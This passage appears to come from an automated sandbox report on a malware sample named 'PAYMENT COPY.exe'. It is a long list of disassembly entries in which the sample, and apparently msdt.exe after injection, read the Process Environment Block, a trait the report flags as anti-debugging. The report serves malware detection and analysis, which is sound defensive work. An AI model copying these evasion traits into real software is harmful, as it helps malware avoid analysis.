          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AF4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AFB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AFB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AEAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AEAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B02AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B02ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B14A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B14A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AF3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B1927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B8B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B8B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B64257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B9EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B04BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B04BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B04BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B02397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B9138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B8D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AFDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B9131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B03B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B03B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B914FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B56CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B56CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B56CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AF746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B6C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B6C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B01DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B01DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B01DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B035A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B88DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B56DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B9E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B5A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B04D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B04D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B04D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AFC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AFC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B13D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B53540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AF7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B546A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B6FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B016E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B18EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B8FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B036CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B8FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B08E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B91608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B9AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B9AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B137F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B6FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B6FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AFF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AEFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AEEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D914FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D6C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D6C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CF746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]
